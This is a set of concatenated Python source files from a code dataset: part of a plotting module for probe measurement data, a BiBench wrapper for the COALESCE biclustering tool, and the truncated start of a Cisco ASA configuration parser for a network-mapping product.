= kwargs.get('split_graph', None)\n self.base_name = kwargs.get('name', None)\n if kwargs.get('old_db', False):\n self.new_db = False\n else:\n self.new_db = True\n if cfg is not None:\n self.__cfg = KITConfig(cfg)\n else:\n self.__cfg = KITConfig()\n self.__cfg.Dir(\"cfg\")\n if defaultCfg is None:\n self.__cfg.Default()\n else:\n self.__cfg.Default(defaultCfg)\n self.__inputName = None\n self.name_lst = None\n self.canvas = None\n\n #####################\n ### Graph methods ###\n #####################\n\n def addFiles(self, dataInput=None, name=None, name_lst=None):\n \"\"\" Depending on the type, the 'self.__files' list is filled with\n KITData objects. An integer represents a single probe ID. A string\n represents a .txt file or a folder path.\n A RPunch measurement, however, origionaly consist of one KITData file\n that needs to be split up into several KITData objects since one bias\n value (x value) represents one graph.\n\n Args:\n dataInput(None|int|str): Determines the way the 'self.__files'\n is filled.\n measurement(str): probe station and ALiBaVa measurements must be\n handled differently due to different database paramters\n name (str): specified name of the measured item for plot legend\n name_lst (list): if there are multiple items that need to be named\n \"\"\"\n if self.base_name is True:\n self.__inputName = dataInput\n self.base_name = None\n return True\n # extract name from data input\n if name is None and self.__inputName is None:\n self.__inputName = self.getDataName(dataInput)\n if name is not None and self.__inputName is None:\n self.__inputName = name\n if name_lst is not None:\n self.name_lst = name_lst\n if self.opt_split:\n self.name_lst, dataInput = self.__split_data(dataInput)\n\n # load dict with plot parameters or create one if not present\n self.__cfg.load(self.__inputName)\n\n if self.__cfg['General', 'Measurement'] == \"probe\":\n # Load KITData\n if isinstance(dataInput, KITData):\n self.log.info(\"Input interpreted as KITData object\")\n self.__files.append(dataInput)\n # self.addGraph(dataInput.getX(),dataInput.getY())\n\n # Load json file\n elif check_json(dataInput):\n self.log.info(\"Input interpreted as json file\")\n for graph_data in convert_json(dataInput):\n self.__files.append(\n KITData(\n (\n graph_data[\"x\"],\n graph_data[\"y\"],\n graph_data[\"z\"],\n graph_data[\"ex\"],\n graph_data[\"ey\"],\n graph_data[\"ez\"]\n ),\n new_db=self.new_db\n )\n )\n\n\n # Load list/tuple with raw data or list with PIDs\n elif isinstance(dataInput, (list, tuple)):\n if all([isinstance(elem, int) for elem in dataInput]):\n self.log.info(\"Input interpreted as list with multiple PIDs\")\n else:\n self.log.info(\"Input interpreted as raw data\")\n for i, tup in enumerate(dataInput):\n self.__files.append(KITData(tup, new_db=self.new_db))\n try:\n self.__files[-1].setName(self.name_lst[i])\n except:\n pass\n\n # Load single integer PID\n elif isinstance(dataInput, int):\n self.__files.append(KITData(dataInput))\n\n elif isinstance(dataInput, str):\n # Load single string PID\n if dataInput.isdigit():\n kdata = KITData(dataInput, new_db=self.new_db)\n self.log.info(\"Input interpreted as single PID\")\n self.__files.append(kdata)\n\n # Load multiple data files in a folder\n elif os.path.isdir(dataInput):\n self.log.info(\"Input interpreted as folder with files\")\n for i, inputFile in enumerate(os.listdir(dataInput)):\n if os.path.splitext(inputFile)[1] == \".txt\" \\\n or os.path.splitext(inputFile)[1] == \".yml\":\n self.__files.append(\n KITData(dataInput + inputFile,\n self.new_db)\n )\n try:\n self.__files[-1].setName(self.name_lst[i])\n except:\n pass\n else:\n pass\n\n # Load file\n elif os.path.isfile(dataInput):\n # multiple PIDs\n if checkPID(dataInput) is True:\n self.log.info(\"Input interpreted as file with PID(s)\")\n with open(dataInput) as inputFile:\n fileList = []\n for i, line in enumerate(inputFile):\n entry = line.split()\n if entry[0].isdigit():\n fileList.append(\\\n KITData(dataInput=entry[0],\n measurement=self.__cfg['General', 'Measurement'],\n new_db=self.new_db))\n try:\n fileList[-1].setName(self.name_lst[i])\n except:\n pass\n # if measurement == \"probe\":\n self.__files = fileList\n # elif measurement == \"alibava\":\n # self.__files.append(KITData(fileList))\n\n # singel file\n else:\n self.log.info(\"Input interpreted as single file\")\n self.__files.append(KITData(dataInput))\n try:\n self.__files[-1].setName(self.name_lst[0])\n except:\n pass\n\n # new feature: multiple PIDs in argument\n elif any(n in dataInput for n in [\"[\", \"]\", \"(\", \")\"]):\n entry = dataInput.replace(\"[\", \"\").replace(\"]\", \"\")\\\n .replace(\"(\", \"\").replace(\")\", \"\").split(\",\")\n if all([n.isdigit() for n in entry]):\n self.log.info(\"Input interpreted as argument with\"\n \"multiple PIDs \")\n for pid in entry:\n kdata = KITData(pid, new_db=self.new_db)\n self.__files.append(kdata)\n\n\n return True\n\n\n def draw(self, dataInput=None):\n \"\"\"Searches for cfg file, load plot parameters, creates canvas, graphs\n and lodgers.\n \"\"\"\n # create graphs and canvas\n if dataInput is None:\n self.canvas, self.ax = KITMatplotlib(\n self.__cfg,\n self.check_if_new_cfg(self.__cfg.getDir(),\n self.__inputName))\\\n .draw(self.__files, reset=self.opt_reset)\n else:\n self.canvas, self.ax = KITMatplotlib(\n self.__cfg,\n self.check_if_new_cfg(\n self.__cfg.getDir(), self.__inputName)).draw(\n dataInput, reset=self.opt_reset)\n\n # check if there are lodgers in cfg and if so, add them to plot\n self.getLodgers()\n\n return True\n\n def showCanvas(self, save=None):\n \"\"\"Make canvas pop up \"\"\"\n if self.canvas:\n if save is True:\n self.saveCanvas()\n plt.draw()\n plt.waitforbuttonpress(0)\n plt.close()\n else:\n self.log.info(\"There is no canvas to show\")\n return True\n\n def saveCanvas(self):\n \"\"\"Saves output as png and pdf file\"\"\"\n png_out = os.path.join(\"output\", self.__inputName) + \".png\"\n pdf_out = os.path.join(\"output\", self.__inputName) + \".pdf\"\n self.canvas.savefig(png_out)\n self.canvas.savefig(pdf_out)\n return True\n\n######################\n### Lodger methods ###\n######################\n\n def getLodgers(self):\n \"\"\" Read the cfg and create a lodger object for every entry in\n 'Lodgers'.\"\"\"\n try:\n for lodger in self.__cfg['Lodgers']:\n paraDict = dict(self.__cfg['Lodgers'][lodger])\n x = paraDict.get('x', None)\n y = paraDict.get('y', None)\n name = paraDict.get('name', None)\n color = paraDict.get('color', None)\n width = paraDict.get('width', None)\n style = paraDict.get('style', None)\n text = paraDict.get('text', None)\n fontsize = paraDict.get('fontsize', None)\n alpha = paraDict.get('alpha', None)\n opt_dict = paraDict.get('opt_dict', dict())\n\n\n self.addLodger(self.canvas, x=x, y=y, name=name, color=color,\n style=style, width=width, text=text,\n fontsize=fontsize, alpha=alpha,\n opt_dict=opt_dict)\n except ValueError as err:\n self.log.error(err)\n except:\n pass\n\n\n def addLodger(self, fig, **kwargs):\n \"\"\"Create new Lodger object and add it to canvas\"\"\"\n newLodger = KITLodger(fig, **kwargs)\n self.canvas = newLodger.add_to_plot()\n newLodger.add_to_cfg(self.__cfg)\n\n return True\n\n def get_fit(self, data_lst, data_opt=\"pointwise\", fit_opt=\"linear\",\n returns=\"fit\", residual=False, name=None):\n \"\"\"Fits data points. 'data_lst' is expected to a list containing list\n elements with list(x) and list(y) values.\n Args:\n - data_lst = [[[x1], [y1]], [[x2], [y2]], [[x3], [y3]], ...]\n Returns:\n Data points (x-list, y-list) for fit graph\n \"\"\"\n if data_opt == \"standard\":\n x = data_lst[0]\n y = data_lst[1]\n if data_opt == \"pointwise\":\n x = [tup[0][0] for tup in data_lst]\n y = [tup[1][0] for tup in data_lst]\n if data_opt == \"listwise\":\n x = data_lst[0]\n y = data_lst[1]\n if fit_opt == \"linear\":\n m, b, _, _, err = stats.linregress(x, y)\n if name is None and residual is False:\n self.log.info(\"Fit result:::(m = %s, y0 = %s)\", str(m), str(b))\n if name is None and residual is True:\n self.log.info(\"Fit result:::(m = %s, y0 = %s, res = %s)\",\n str(m), str(b), str(err))\n if name is not None and residual is False:\n self.log.info(\"Fit result[%s]:::(m = %s, y0 = %s)\",\n name, str(m), str(b))\n if name is not None and residual is True:\n self.log.info(\"Fit result[%s]:::(m = %s, y0 = %s, res = %s)\",\n name, str(m), str(b), str(err))\n if min(x) == 0:\n steps = max(x)*1.1/8\n else:\n steps = min(x)/2\n t = np.arange(min(x), max(x)*1.1, steps)\n f = m * t + b\n if returns == \"fit\":\n return (list(f), list(t))\n if returns == \"result\":\n try:\n return (m, b, err)\n except:\n return (m, b)\n\n\n\n###################\n### Get methods ###\n###################\n\n\n def getGraph(self, graph=None):\n\n if len(self.__graphs) == 1:\n return self.__graphs[0]\n elif (len(self.__graphs) != 1) and (graph is None):\n return self.__graphs\n else:\n if isinstance(graph, str):\n if len(self.__graphs) != 1 and graph.isdigit():\n return self.__graphs[int(graph)]\n else:\n return False\n elif isinstance(graph, int):\n if len(self.__graphs) != 1:\n return self.__graphs[graph]\n else:\n return False\n\n def getFile(self, KITFile=None):\n\n if len(self.__files) == 1:\n return self.__files[0]\n elif len(self.__files) != 1 and KITFile is None:\n return self.__files\n else:\n if isinstance(KITFile, str):\n if len(self.__files) != 1 and KITFile.isdigit():\n return self.__files[int(KITFile)]\n else:\n return False\n elif isinstance(KITFile, int):\n if len(self.__files) != 1:\n return self.__files[KITFile]\n else:\n return False\n\n def getAxis(self):\n if self.ax is None:\n return None\n return self.ax\n\n def getCanvas(self):\n if self.canvas is None:\n return None\n return self.canvas\n\n def getX(self):\n X = []\n for List in self.__files:\n X.append(List.getX())\n return X\n\n def getY(self):\n Y = []\n for List in self.__files:\n Y.append(List.getY())\n return Y\n\n def getDataName(self, dataInput):\n \"\"\"Check data input and try to extract the name for legend, cfg and\n outputfile\"\"\"\n if dataInput is None:\n self.log.info(\"No data input. Name not extractable.\")\n return None\n if isinstance(dataInput, str):\n name = os.path.splitext(os.path.basename(os.path.normpath(str(dataInput))))[0]\n self.log.info(\"Extracted name from data input: %s\", name)\n return name\n elif isinstance(dataInput, int):\n self.log.info(\"Data input interpreted as PID. Name is PID.\")\n return str(dataInput)\n else:\n raise ValueError(\"Unkonwn case in 'getDataName' function\")\n\n def check_if_new_cfg(self, path, name):\n \"\"\"If cfg is new (no cfg present yet) return True, else False\"\"\"\n if self.auto_labeling is False:\n return False\n if os.path.isfile(os.path.join(path, name + \".cfg\")) is True:\n return False\n return True\n\n def __split_data(self, data_input):\n name_lst = []\n line_data = []\n try:\n with open(data_input, \"r\") as data:\n for line in data:\n splitted = line.split()\n name_lst.append(splitted[0])\n try:\n line_data.append(\n (\n [float(splitted[1])],\n [float(splitted[2])],\n [float(splitted[3])],\n [float(splitted[4])]\n )\n )\n except IndexError:\n line_data.append(\n (\n [float(splitted[1])],\n [float(splitted[2])],\n [0],\n [0]\n )\n )\n return name_lst, line_data\n except: #pylint:disable=bare-except\n self.log.error(\"Error while trying to split up the data...\")\n return data_input\n\ndef checkPID(dataInput):\n \"\"\"Checks if PIDs are listed in the file\"\"\"\n if os.path.isfile(dataInput):\n with open(dataInput) as inputFile:\n first_line = inputFile.readline()\n if len(first_line.split()) == 1 \\\n and first_line[0].isdigit():\n return True\n return False\n else:\n raise ValueError(\"Input is not a file.\")\n\n\ndef check_json(dataInput):\n try:\n if os.path.isfile(dataInput):\n if os.path.splitext(dataInput)[1] == \".json\":\n return True\n except TypeError:\n pass\n return False\n\ndef convert_json(dataInput):\n valid_keys = [\"x\", \"y\", \"z\", \"ex\", \"ey\", \"ez\"]\n with open(dataInput, \"r\") as stream:\n data = json.load(stream)\n if isinstance(data, dict):\n data = [data]\n stream.close()\n\n for dic in data:\n graph_data = {\"x\": [], \"y\": [], \"z\": [], \"ex\": [], \"ey\": [],\n \"ez\": [], \"name\": None}\n for key in dic:\n if key in valid_keys:\n graph_data[key] = dic[key]\n yield graph_data\n","sub_path":"kitplot.py","file_name":"kitplot.py","file_ext":"py","file_size_in_byte":19219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"231377977","text":"####################################################################\n### ____ _ ____ _ ###\n### | __ )(_) __ ) ___ _ __ ___| |__ ###\n### | _ \\| | _ \\ / _ \\ '_ \\ / __| '_ \\ ###\n### | |_) | | |_) | __/ | | | (__| | | | ###\n### |____/|_|____/ \\___|_| |_|\\___|_| |_| ###\n### ###\n###--------------------------------------------------------------###\n### ###\n### This file is part of the BiBench package for biclustering ###\n### analysis. ###\n### ###\n### Copyright (c) 2011 by: ###\n### * Kemal Eren, ###\n### * Mehmet Deveci, ###\n### * Umit V. Catalyurek ###\n### ###\n###--------------------------------------------------------------###\n### ###\n### For license info, please see the README and LICENSE files ###\n### in the main directory. ###\n### ###\n###--------------------------------------------------------------###\n\n\"\"\"Coalesce algorithm wrapper for finding biclusters with up and down regulated TF.\"\"\"\nimport os, subprocess\n\nfrom bibench.algorithms.wrapper import wrapper_helper\nfrom bibench.bicluster import \\\n Bicluster, BiclusterList, bicluster_algorithm\nfrom bibench.datasets import io\nimport bibench.util as util\n\nBINARY = 'COALESCE'\n\n@bicluster_algorithm\ndef coalesce(data,\n geneModuleProbability=0.95,\n conditionPvalueThreshold=0.05,\n conditionZThreshold=0.5,\n normalize=False):\n \"\"\"\n Wrapper for the COALESCE binary.\n\n Args:\n * data: numpy.ndarray\n * geneModuleProbability: the probability threshhold for including\n genes in a regulatory module.\n * conditionPvalueThreshold: the P-value threshhold for including\n conditions in a regulatory module.\n * conditionZThreshold: the Z-score threshhold for including\n conditions in a regulatory module.\n * normalize: whether to normalize the data.\n\n Returns:\n A list of biclusters.\n\n \"\"\"\n if normalize is False:\n normalize = 0\n else:\n normalize = 1\n kwargs = locals()\n return wrapper_helper(BINARY,\n _write_dataset_,\n _read_results_,\n _do_call_,\n **kwargs)\n\n\ndef _do_call_(data, datafile, results_dir, **kwargs):\n \"\"\"Executes the COALESCE with given parameters\"\"\"\n\n command = \"{binary} -i {0}\" \\\n \" -p {geneModuleProbability}\" \\\n \" -c {conditionPvalueThreshold}\" \\\n \" -C {conditionZThreshold}\".format(datafile, binary=BINARY, **kwargs)\n\n if kwargs[\"normalize\"] is not 0:\n command += \" -e \"\n\n stndout = os.path.join(results_dir, \"bic.out\")\n stnderr = os.path.join(results_dir, \"debug.out\")\n\n with open(stndout, 'w') as out:\n with open(stnderr, 'w') as err:\n subprocess.check_call(command.split(), stdout=out, stderr=err)\n\n\ndef _read_results_(dirname, data):\n \"\"\"\n Read the result file which is bic.out and returns the list of\n bicluster objects.\n\n \"\"\"\n bicOut = os.path.join(dirname, \"bic.out\")\n f = open(bicOut,'r')\n\n biclusters = []\n for clusterLine, geneLine, conditionLine, motifLine in util.grouper(f, 4):\n bic = _createBicluster_(geneLine, conditionLine, data)\n biclusters.append(bic)\n f.close()\n return biclusters\n\n\ndef _createBicluster_(geneLine, conditionLine, data):\n \"\"\"\n Extracts the rows and columns of the bicluster from the given gene\n and condition line\n\n \"\"\"\n genes = map(int, geneLine.split('\\t')[1:])\n conditions = map(int, conditionLine.split('\\t')[1:])\n return Bicluster(genes, conditions, data)\n\n\ndef _write_dataset_(data, filename):\n \"\"\"Writes a dataset in the format for Coalesce into pcl format.\"\"\"\n io.write_pcl_dataset(data, filename)\n","sub_path":"bibench/algorithms/coalesce.py","file_name":"coalesce.py","file_ext":"py","file_size_in_byte":4485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"342730551","text":"#########################################################################\n# #\n# This file is a Python parser module for PGT Network Map and is #\n# written to parse the configuration on Cisco ASA devices. #\n# #\n# You may not use this file without a valid PGT Enterprise license. #\n# You may not duplicate or create derivative work from this script #\n# without a valid PGT Enterprise license #\n# #\n# Copyright Laszlo Frank (c) 2014-2019 #\n# #\n#########################################################################\nimport clr\nclr.AddReferenceToFileAndPath(\"PGTInterfaces.dll\")\nclr.AddReferenceToFileAndPath(\"PGTNetworkMap.dll\")\nclr.AddReferenceToFileAndPath(\"Common.dll\")\nimport System\nimport L3Discovery\nimport PGT.Common\nimport re\nfrom System.Diagnostics import DebugEx, DebugLevel\nfrom System.Net import IPAddress\nfrom L3Discovery import NeighborProtocol\nfrom PGT.Common import IPOperations\n# last changed : 2019.04.09\nscriptVersion = \"0.0.1\"\nclass CiscoASA(L3Discovery.IRouter):\n # Beyond _maxRouteTableEntries only the default route will be queried\n _maxRouteTableEntries = 30000 \n _defaultRoutingInstanceName = \"\"\n def __init__(self):\n # The device version info string\n self._versionInfo = None\n # The device inventory string\n self._inventory = None\n # HostName\n self._hostName = None\n # Number of member in a stack\n self._stackCount = 0\n # Not supported by IOS, return default only\n self._logicalSystems = [\"Default\"]\n # The dictionary of RoutingInstances keyed by LogicalSystem name\n self._routingInstances = {}\n # The routing protocols run by this router, dictionary keyed by routing instamce name\n self._runningRoutingProtocols = {} \n # The current PGT settings \n self.ScriptSettings = PGT.Common.SettingsManager.GetCurrentScriptSettings()\n # The ModelNumber calculated from Inventory\n self._ModelNumber = None\n # The SystemSerial calculated from Inventory\n self._SystemSerial = None \n # Describes the current operation\n self._operationStatusLabel = \"Idle\"\n # The RouterIDCalculator object\n self._ridCalculator = RouterIDCalculator(self)\n # The InterfaceParser object\n self._interfaceParser = InterfaceParser(self)\n \n \n def GetHostName(self):\n \"\"\" Returns the host bane as a string\"\"\"\n if not self._hostName : self._hostName = Session.GetHostName()\n return self._hostName\n \n def GetInventory(self):\n \"\"\"Returns the device inventory string\"\"\"\n if not self._inventory : \n self._inventory = Session.ExecCommand(\"show inventory\")\n return self._inventory\n \n def GetLogicalSystemNames(self):\n \"\"\" Returns the list of Logical Systems as a string list\"\"\"\n return self._logicalSystems\n \n def GetManagementIP(self):\n \"\"\"Returns the management ip address as a string\"\"\"\n return ConnectionInfo.DeviceIP\n \n def GetModelNumber(self):\n \"\"\"Returns Model number as a string, calculated from Inventory\"\"\"\n if not self._ModelNumber :\n mn = \"\"\n inv = self.GetInventory()\n models = re.findall(r\"(?<=DESCR:).*\", inv)\n if len(models) >= 1:\n self._ModelNumber = models[0].strip('\"')\n else:\n self._ModelNumber = \"n/a\"\n return self._ModelNumber\n \n def GetOperationStatusLabel(self):\n \"\"\"Returns a string describibg current activity\"\"\"\n return self._operationStatusLabel\n \n def GetPlatform(self):\n \"\"\"Return a string\tto describe device Platform\"\"\"\n return \"ASA\"\n \n def GetSession(self):\n \"\"\"Returns the actual Session object\"\"\"\n return Session\n \n def GetStackCount(self):\n \"\"\"Returns the number of members in a switch stack\"\"\"\n return 1\n \n def GetSupportTag(self):\n \"\"\"Returns a string describing capability of this instance\"\"\"\n global scriptVersion\n return \"Cisco Adaptive Security Appliance support module - Python Parser v{0}\".format(scriptVersion)\n \n def GetSystemSerial(self):\n \"\"\"Returns System serial numbers as a string, calculated from Inventory\"\"\"\n if not self._SystemSerial :\n # check inventory for serial numbers\n inv = self.GetInventory()\n SNs = re.findall(r\"(?<=SN: ).*\", inv, re.IGNORECASE)\n if len(SNs) > 0 :\n self._SystemSerial = SNs[0]\n return self._SystemSerial\n \n def GetDeviceType(self):\n \"\"\"Returns Type string that can be Switch, Router or Firewall, depending on Model\"\"\"\n return \"Firewall\"\n \n def GetVendor(self):\n \"\"\"Must return a string matching the Vendor name this parser is responible for\"\"\"\n return \"Cisco-ASA\"\n \n def GetVersion(self):\n \"\"\"Must return device version string \t\"\"\"\n if not self._versionInfo:\n self._versionInfo = Session.ExecCommand(\"show version\")\n return self._versionInfo\n \n def ActiveProtocols(self, instance):\n \"\"\"Returns the list of NeighborProtocols running on the requested routing instance \"\"\"\n defaultInstanceName = L3Discovery.RoutingInstance.DefaultInstanceName(self.GetVendor())\n instanceName = defaultInstanceName\n if instance : instanceName = instance.Name\n if self._runningRoutingProtocols.get(instanceName, None) == None:\n self._runningRoutingProtocols[instanceName] = []\n if len(self._runningRoutingProtocols[instanceName]) == 0 :\n # // -- check running routing protocols\n cmd = \"show ip protocols\"\n if instanceName != defaultInstanceName : \n cmd = \"show ip protocols vrf {0}\".format(instanceName)\n response = str.lower(Session.ExecCommand(cmd));\n \n mathcedProtocolNames = []\n matches = re.finditer(r\"(?<=routing protocol is ).([a-z]{0,99})\", response, re.MULTILINE | re.IGNORECASE)\n for matchNum, match in enumerate(matches, start=1):\n for groupNum in range(0, len(match.groups())):\n groupNum = groupNum + 1 \n mathcedProtocolNames.append(match.group(groupNum)) \n supportedProtocols = System.Enum.GetValues(clr.GetClrType(L3Discovery.NeighborProtocol))\n for thisProtocol in supportedProtocols :\n if str(thisProtocol).lower() in mathcedProtocolNames : \n # In case we are checking the global routing instance. we must perform further checks\n # because \"show ip protocols\" reports all protocols across all VRFs unfortunately\n if instanceName == defaultInstanceName : \n if thisProtocol == L3Discovery.NeighborProtocol.BGP:\n b = Session.ExecCommand(\"show ip bgp summary\")\n if b : self._runningRoutingProtocols[ instanceName ].Add(thisProtocol)\n elif thisProtocol == L3Discovery.NeighborProtocol.OSPF:\n o = Session.ExecCommand(\"show ip ospf neighbor\")\n if o : self._runningRoutingProtocols[ instanceName ].Add(thisProtocol)\n elif thisProtocol == L3Discovery.NeighborProtocol.EIGRP:\n e = Session.ExecCommand(\"show ip eigrp neighbor\")\n if e : self._runningRoutingProtocols[ instanceName ].Add(thisProtocol)\n elif thisProtocol == L3Discovery.NeighborProtocol.RIP:\n e = Session.ExecCommand(\"show ip rip neighbor\")\n if e : self._runningRoutingProtocols[ instanceName ].Add(thisProtocol)\n else:\n self._runningRoutingProtocols[ instanceName ].Add(thisProtocol)\n \n # STATIC \n cmd = \"show ip route static\"\n if instanceName != defaultInstanceName:\n cmd = \"show ip route vrf {0} static\".format(instanceName)\n response = Session.ExecCommand(cmd); \n if response : \n self._runningRoutingProtocols[instance.Name].append(NeighborProtocol.STATIC) \n \n \n #\n # CDP/LLDP - Apparently, Cisco does not want to implement CDP / LLDP on ASA\n #\n # VPN - supporting L2L IPSec\n if instanceName == defaultInstanceName:\n ipsecTunnels = Session.ExecCommand(\"show vpn-sessiondb summary | i IPsec\")\n numbers = GetRegexGroupMatches(r\"\\s(\\d+)\", ipsecTunnels, 1)\n if len(numbers) > 0 and int(numbers[0]) > 0 :\n self._runningRoutingProtocols[instanceName].Add(NeighborProtocol.IPSEC)\n pass \n \n result = self._runningRoutingProtocols[instanceName]\n return result\n \n def BGPAutonomousSystem(self, instance):\n \"\"\"Returns the BGP AN number for the requested routing instance\"\"\"\n return self._ridCalculator.GetBGPASNumber(instance)\n \n def GetInterfaceByName(self, interfaceName, instance):\n \"\"\"Returns the RouterInterface object for the requested interface name\"\"\"\n return self._interfaceParser.GetInterfaceByName(interfaceName, instance)\n \n def GetInterfaceConfiguration(self, routerInterface):\n \"\"\"Return a boolean value if sucessfully updated the Configuration of the routerInterface object specified\"\"\"\n try: \n routerInterface.Configuration = self._interfaceParser.GetInterfaceConfiguration(routerInterface.Name)\n return True\n except:\n return False\n \n def GetInterfaceNameByIPAddress(self, address, instance):\n \"\"\"Returns the name of the interface specified by ip address\"\"\"\n return self._interfaceParser.GetInterfaceNameByAddress(address, instance)\n \n def Initialize(self, session):\n \"\"\"Return a boolean value indicating whether the current instance is capable of handling the device connected in session\"\"\"\n # Session global variable will always contain the actual session, therefore we don't need to\n # keep a referecnce to the session vsariable passed over here\n self._defaultRoutingInstanceName = L3Discovery.RoutingInstance.DefaultInstanceName(self.GetVendor())\n v = self.GetVersion()\n return \"adaptive security appliance\" in v.lower()\n \n def RegisterNHRP(self, neighborRegistry, instance):\n \"\"\"Collects NHRP protocol information and registers it with Network Discovery Engine\"\"\"\n # neighborRegistry :The NetworkRegistry object\n # instance :The Routing instance reference\n # \n # Sample input for parsing\n #\n #GigabitEthernet0/0/1 - Group 44\n # State is Active\n #\t 5 state changes, last state change 4w4d\n # Virtual IP address is 10.81.0.1\n # Active virtual MAC address is 0000.0c07.ac2c(MAC In Use)\n #\t Local virtual MAC address is 0000.0c07.ac2c(v1 default)\n # Hello time 1 sec, hold time 3 sec\n #\t Next hello sent in 0.256 secs\n # Authentication text, string \"ROWVA252\"\n # Preemption enabled, delay min 60 secs\n # Active router is local\n # Standby router is 10.81.0.3, priority 100 (expires in 3.040 sec)\n # Priority 105 (configured 105)\n #\t\t\tTrack object 1 state Up decrement 10\n # Group name is \"hsrp-Gi0/0/1-44\" (default)\n VIPAddress = \"\"\n GroupID = \"\"\n PeerAddress = \"\"\n isActive = False\n ri = None\n hsrpSummary = Session.ExecCommand(\"show standby\")\n for thisLine in hsrpSummary.splitlines():\n try:\n indentLevel = len(thisLine) - len(thisLine.lstrip(' '))\n if indentLevel == 0:\n # interface definition is changing\n if GroupID and VIPAddress :\n neighborRegistry.RegisterNHRPPeer(self, instance, ri, L3Discovery.NHRPProtocol.HSRP, isActive, VIPAddress, GroupID, PeerAddress)\n VIPAddress = \"\"\n GroupID = \"\"\n PeerAddress = \"\"\n ri = None\n # -- \n words = filter(None, thisLine.split(\" \"))\n if len(words) >= 3 :\n ifName = words[0]\n ri = self.GetInterfaceByName(ifName, instance)\n match = re.findall(r\"(?<=Group )\\d{0,99}\", thisLine, re.IGNORECASE)\n if len(match) == 1 : GroupID = words[2]\n continue\n if ri :\n l = thisLine.lower().lstrip()\n if l.startswith(\"virtual ip address is\") :\n match = re.findall(r\"\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b\", l, re.IGNORECASE)\n if len(match) == 1 : VIPAddress = match[0]\n continue\n if l.startswith(\"active router is local\") :\n isActive = True\n continue\n if l.startswith(\"standby router is\") :\n match = re.findall(r\"\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b\", l, re.IGNORECASE)\n if len(match) == 1 : PeerAddress = match[0]\n continue\n except Exception as Ex:\n message = \"CiscoASA Router Module Error : could not parse NHRP information <{0}> because : {1} \".format(thisLine, str(Ex))\n DebugEx.WriteLine(message)\n \n # -- register the last one\n if ri and VIPAddress and GroupID :\n neighborRegistry.RegisterNHRPPeer(self, instance, ri, L3Discovery.NHRPProtocol.HSRP, isActive, VIPAddress, GroupID, PeerAddress) \n \n\n \n \n def Reset(self):\n \"\"\"Resets all instance variables to its default value\"\"\"\n self._versionInfo = None\n self._inventory = None\n self._hostName = None\n self._stackCount = 0\n self._logicalSystems = []\n self._routingInstances = {}\n self._runningRoutingProtocols = {} \n self.ScriptSettings = PGT.Common.SettingsManager.GetCurrentScriptSettings()\n self._ModelNumber = None\n self._SystemSerial = None \n self._operationStatusLabel = \"Idle\"\n self._ridCalculator.Reset()\n self._interfaceParser.Reset() \n \n def RoutedInterfaces(self, instance):\n \"\"\"Returns the RouterInterface object list for the requested routing instance\"\"\"\n return self._interfaceParser.GetAllInterfaces(instance)\n \n def RouterID(self, protocol, instance):\n \"\"\"Returns the router ID string for the requested protocol and routing intance\"\"\"\n return self._ridCalculator.GetRouterID(protocol, instance)\n \n def RoutingInstances(self, logicalSystemName):\n \"\"\"Returns the list of RoutingInstance objects for the VRFs running on the requested logical system (VDC)\"\"\"\n if not logicalSystemName : \n logicalSystemName = \"Default\"\n if self._routingInstances.get(logicalSystemName, None) == None : \n self._routingInstances[logicalSystemName] = []\n \n if len(self._routingInstances[logicalSystemName]) == 0:\n instances = []\n # ASA does not natively support VRFs, so add the default (global) instance only\n defInstance = L3Discovery.RoutingInstance()\n defInstance.LogicalSystemName = logicalSystemName\n defInstance.DeviceVendor = \"Cisco\"\n defInstance.Name = self._defaultRoutingInstanceName\n instances.append(defInstance)\n self._routingInstances[logicalSystemName] = instances\n \n result = self._routingInstances[logicalSystemName]\n return result\n \n def RouteTableSize(self, instance):\n \"\"\"Returns the size of the route table for the requested routing instance\"\"\"\n instanceName = self._defaultRoutingInstanceName\n if instance : instanceName = instance.Name\n routeTableSize = -1\n try :\n cmd = \"show route summary\"\n \n routeSummary = Session.ExecCommand(cmd) \n routeTotals = filter(lambda s: s.startswith(\"Total\"), routeSummary.splitlines())\n \n if len(routeTotals) > 0:\n # return the last number in Total line\n words = filter(None, routeTotals[0].split(' '))\n routeTableSize = int(words[2])\n except Exception as Ex :\n DebugEx.WriteLine(\"CiscoASA : error calculating route table size : {0}\".format(str(Ex)))\n \n return routeTableSize\n \n def RoutingTable(self, instance):\n \"\"\"Returns the list of RouteTableEntry objects for requested RoutingInstance\"\"\"\n parsedRoutes = []\n try:\n if instance : \n instanceName = instance.Name\n # get route table size\n routeTableSize = self.RouteTableSize(instance)\n if routeTableSize > self._maxRouteTableEntries :\n # query only default route \n cmd = \"show route 0.0.0.0\"\n else:\n # query inet.0 route table for the requested instance\n cmd = \"show route\"\n routes = Session.ExecCommand(cmd)\n \n thisProtocol = NeighborProtocol.UNKNOWN\n expectingNextHop = False\n prefix = \"\"\n maskLength = -1\n subnettedPrefix = \"\"\n subnettedMaskLength = -1\n nextHop = \"\"\n adminDistance = \"\"\n routeMetric = \"\"\n parserSuccess = False\n outInterface = \"\"\n for rLine in [line.strip() for line in routes.splitlines()]:\n if \"subnetted\" in rLine:\n # lets check if we find an ipAddress subnetMask combination in the line\n m = re.findall(r\"\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b\\/\\d{1,2}\", rLine)\n if len(m) == 1 :\n prefixAndMask = m[0].split('/')\n if len(prefixAndMask) == 2 :\n subnettedPrefix = prefixAndMask[0]\n # proceed to next rLine\n continue\n if rLine.startswith(\"B\") :\n thisProtocol = NeighborProtocol.BGP\n expectingNextHop = False\n elif rLine.startswith(\"O\") or rLine.startswith(\"IA\") or rLine.startswith(\"N1\") or rLine.startswith(\"N2\") or rLine.startswith(\"E1\") or rLine.startswith(\"E2\") :\n thisProtocol = NeighborProtocol.OSPF\n expectingNextHop = False\n elif rLine.startswith(\"D\") or rLine.startswith(\"EX\") :\n thisProtocol = NeighborProtocol.EIGRP;\n expectingNextHop = False;\n elif rLine.startswith(\"R\") :\n thisProtocol = NeighborProtocol.RIP\n expectingNextHop = False\n elif rLine.startswith(\"L\") :\n thisProtocol = NeighborProtocol.LOCAL\n expectingNextHop = False\n elif rLine.startswith(\"C\") :\n thisProtocol = NeighborProtocol.CONNECTED\n expectingNextHop = False\n elif rLine.startswith(\"S\") :\n 